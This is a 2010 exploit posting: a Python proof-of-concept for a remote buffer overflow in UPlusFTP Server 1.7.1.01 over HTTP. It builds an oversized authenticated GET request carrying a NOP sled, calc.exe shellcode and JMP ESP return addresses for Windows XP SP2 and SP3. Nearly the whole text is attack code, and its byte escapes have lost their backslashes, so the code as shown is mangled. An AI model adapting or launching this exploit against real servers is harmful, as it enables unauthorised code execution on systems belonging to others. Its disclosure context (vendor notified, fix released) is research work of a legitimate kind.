uplusftp-overflow.txt
Posted on 28 July 2010
#!/usr/bin/python import socket,sys,base64 print """ # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ UPlusFTP Server v1.7.1.01 [ HTTP ] Remote BoF Exploit PoC Discovered by : Karn Ganeshen Author : Karn Ganeshen / corelanc0d3r KarnGaneshen [aT] gmail [d0t] com http://ipositivesecurity.blogspot.com Greetz out to: corelanc0d3r http://corelan.be:8800/index.php ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # """ # Tested on XP Pro SP2 [ Eng ] and XP Pro SP3 [ Eng ] # Date Found : July 21, 2010 # Vendor notified on July 23, 2010 # Issue fixed and new version 1.7.1.02 released on July 23, 2010 if len(sys.argv) != 5: print "Usage: ./poc.py <Target IP> <Port> <User> <Password>" sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) user = sys.argv[3] pwd = sys.argv[4] auth = base64.b64encode(user+":"+pwd) buf="A"*1963 buf+="x90"*179 # 165 bytes Calc.exe shellcode / badchars identified and excluded buf+=("xd9xcax29xc9xb1x24xbfx3fxc7x66x9fxd9x74x24xf4x5e" "x31x7ex17x03x7ex17x83xf9xc3x84x6axf9x24x0cx95x01" "xb5x06xd0x3dx3ex64xdex45x41x7ax6bxfax59x0fx33x24" "x5bxe4x85xafx6fx71x14x41xbex45x8ex31x45x85xc5x4e" "x87xccx2bx51xc5x3axc7x6ax9dx98x2cxf9xf8x6ax73x25" "x02x86xeaxaex08x13x78xefx0cxa2x95x84x31x2fx68x71" "xc0x73x4fx81x10xbax4fxedx1dxfdx7fx68xe1x86x73xf9" "xa2x7ax07x8dx3ex2ex9cx05x37xdbxaax5exc7xabxadx60" "xc8x40xc5x5cx97x67xe0xfcx71x01xf4x7fxbdx6ax55x17" "xcex07x51xb8x46x80xa4xccx99xe7xa7x37xc6x66x34xd4" "x27x0cxbcx7fx38") buf+="x90"*15 #[ XP SP2 ] -> "x78x16xF3x77" #0x77F31678 JMP ESP buf+="x78x16xF3x77" #[ XP SP3 ] -> "x3Fx71x49x7E" #0x7E49713F JMP ESP #buf+="x3Fx71x49x7E" buf+="x90"*30 buf+="x66x05x7Ax03" #ADD AX,037A buf+="x66x05x7Ax03" #ADD AX,037A buf+="x66x05x7Ax03" #ADD AX,037A buf+="x50xc3" #PUSH EAX + RET print "[+] Launching exploit against " + target + "..." head = "GET /list.html?path="+buf+" HTTP/1.1 " head += "Host: " head += "Authorization: Basic "+auth+" " try: s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((target, port)) s.send(head + " ") print "[!] Payload sent..." s.close() except: print "[x] Error!"
